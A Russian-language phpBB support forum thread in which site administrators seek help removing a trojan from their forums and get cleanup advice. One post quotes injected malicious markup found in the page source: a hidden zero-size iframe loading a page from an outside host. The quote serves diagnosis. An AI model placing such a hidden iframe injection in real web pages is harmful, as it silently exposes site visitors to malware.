Как убить Трояна?

Вопросы без привязки к версии. Установлена авточистка (2 года).
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения

Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ;) ).
AdmninsCluba
phpBB 1.2.1
Сообщения: 22
Стаж: 18 лет 7 месяцев
Благодарил (а): 1 раз

Как убить Трояна?

Сообщение AdmninsCluba »

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html
serega--909
phpBB 1.0.0
Сообщения: 9
Стаж: 14 лет 10 месяцев

Re: Как убить Трояна?

Сообщение serega--909 »

MAzZY писал(а):Значит поиском по файлам. Что непонятного?По нормальному, надо было бэкап восстановить и не парить никому мозни
А если на сервере нет поиска по файлам, а с моим инетом качать все файлы буду до завтра.
Бэкап к сожалению у меня староват - отсутствуют некоторые моды. Поэтому из него не хотелось бы восстанавливаться. Вот и решил спросить, может кто знает. Ну ладно, буду искать сам(((
Аватара пользователя
DK7
Former team member
Сообщения: 1008
Стаж: 18 лет 9 месяцев
Откуда: Кишинёв
Благодарил (а): 1 раз

Re: Как убить Трояна?

Сообщение DK7 »

в базе еще глянь. Бывает и туда пробирается.
MAzZY
Бывший член :)
Сообщения: 2925
Стаж: 19 лет 11 месяцев
Благодарил (а): 19 раз
Поблагодарили: 30 раз
Забанен: Бессрочно

Re: Как убить Трояна?

Сообщение MAzZY »

У хостера бэкап есть. А вообще, нужно самостоятельно делать бэкапы еженедельно как минимум
Аватара пользователя
Di_Mok
Former team member
Сообщения: 814
Стаж: 15 лет 1 месяц
Откуда: Родной Гондурас ;)
Благодарил (а): 28 раз
Поблагодарили: 13 раз

Re: Как убить Трояна?

Сообщение Di_Mok »

Не совсем понял, что это было. Для простоты объяснения скрин:
Безымянный5.jpg
Т.е. окошко Оперы, подобное как при авторизации в прокси, с левым адресом. Ссылочку не даю, т.к. форум не мой и спросить сейчас разрешения не у кого :D
В поле "Сервер" имя_этого_домена.rxfly.net. Еще было: имя_этого_домена.xp3.biz

Пропало после чистки кэша. В файлах форума никакого криминала не нашёл.
У вас нет необходимых прав для просмотра вложений в этом сообщении.
Аватара пользователя
MIT
Former team member
Сообщения: 2500
Стаж: 16 лет 1 месяц
Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
Поблагодарили: 26 раз

Re: Как убить Трояна?

Сообщение MIT »

Хостер шалит.
Аватара пользователя
Di_Mok
Former team member
Сообщения: 814
Стаж: 15 лет 1 месяц
Откуда: Родной Гондурас ;)
Благодарил (а): 28 раз
Поблагодарили: 13 раз

Re: Как убить Трояна?

Сообщение Di_Mok »

Была такая мысль, стучался в чат к саппорту, но они делали круглые глаза.
Аватара пользователя
MIT
Former team member
Сообщения: 2500
Стаж: 16 лет 1 месяц
Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
Поблагодарили: 26 раз

Re: Как убить Трояна?

Сообщение MIT »

Возможно что не хостер форума, а хостер, на чьих серверах лежит реклама, размещаемая на форуме.
Аватара пользователя
Di_Mok
Former team member
Сообщения: 814
Стаж: 15 лет 1 месяц
Откуда: Родной Гондурас ;)
Благодарил (а): 28 раз
Поблагодарили: 13 раз

Re: Как убить Трояна?

Сообщение Di_Mok »

Рекламы там нет, но видел подобное на IPB, там было из за подписи http://volgafishing.ru/forum/index.php? ... t&p=585115
Ildark
phpBB 1.0.0
Сообщения: 7
Стаж: 15 лет 10 месяцев

Снова вирус на форуме

Сообщение Ildark »

Вот здесь уже описывал это проблему с вирусом (сейчас ветка закрыта) - 2 проблемы: вирус на форуме и не приходят уведомления
Тему Как убить Трояна? изучил вдоль и поперёк. Все рекомендации выполнил, прогнал комп несколькими антивирусами (касперский, аваст, авира)
Проблема не с вирусом не исчезла, но и не постоянная. Т.е. при заходе на форум антивирус может ругнуться и в коде страницы вижу вредоносный код -

Код: Выделить всё

<div id="search-box"><iframe src="http://flicker.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe>
Если обновить страницу, то код пропадает.
Вот нарыл онлайн-сервис по проверке сайта на вирусы http://www.error-bank.com/?url=http%3A% ... atishka.ru, тоже то показывает наличие вируса, то говорит что всё ок.
То же самое с яндексом, то всё ок, то обнаруживает вредоносный код.
В файлах шаблонов всё чисто.
Аватара пользователя
crash
Former team member
Сообщения: 6517
Стаж: 20 лет 9 месяцев
Откуда: Бердск

Re: Снова вирус на форуме

Сообщение crash »

так а в теме про вирус сложно было сообщение создать?
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Ildark
phpBB 1.0.0
Сообщения: 7
Стаж: 15 лет 10 месяцев

Re: Снова вирус на форуме

Сообщение Ildark »

В теме Как убить Трояна?
Создать-то несложно, просто вирус у меня какой-то нестандартный, вот и решил отдельную тему сделать.
Если это необходимо, могу скопировать своё сообщение туда, а модераторы удалят эту тему.
Аватара пользователя
Пчелкин
phpBB 3.3.0
Сообщения: 11121
Стаж: 15 лет 3 месяца
Откуда: fotovideoforum.ru
Благодарил (а): 670 раз
Поблагодарили: 122 раза

Re: Снова вирус на форуме

Сообщение Пчелкин »

Копируйте
NIKON-D90, AF-S 18-105, AF-S 14-24, AF-S 24-70
Ildark
phpBB 1.0.0
Сообщения: 7
Стаж: 15 лет 10 месяцев

Re: Снова вирус на форуме

Сообщение Ildark »

Копируйте
Это пусть кто-нибудь из администрации форума скажет.
Ildark
phpBB 1.0.0
Сообщения: 7
Стаж: 15 лет 10 месяцев

Re: Как убить Трояна?

Сообщение Ildark »

Добавлю деталей:
1. На данном хостинге размещено несколько наших сайтов (в том числе ещё один форум на phpbb 3.0.8), но заражен только один. Если бы был похищен пароль от фтп, то остальные тоже были бы заражены.
2. Вот сегодня Яндекс снова не нашёл на форуме вирусов, хотя я ничего не изменял - ни пароли, ни файлы форума.
Аватара пользователя
crash
Former team member
Сообщения: 6517
Стаж: 20 лет 9 месяцев
Откуда: Бердск

Re: Как убить Трояна?

Сообщение crash »

Ildark писал(а):Это пусть кто-нибудь из администрации форума скажет.
то есть пока в лоб не дадут, хрен поумнею?

Добавлено спустя 1 минуту 46 секунд:
в принципе в теме все описано. Как бороться с вирусом то появляющимся то нет, вам врядли скажут. Может когда яндекс находит вирус. то он на вас обижается просто?

Добавлено спустя 2 минуты 13 секунд:
Ildark
вам вообще надо что-то делать с сайтом. 2 проблемы: вирус на форуме и не приходят уведомления вот еще одна ваша тема и тоже про вирус, а вы плодите все новые темы и связаны с одним и тем же.
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса

Вернуться в «phpBB-пространство»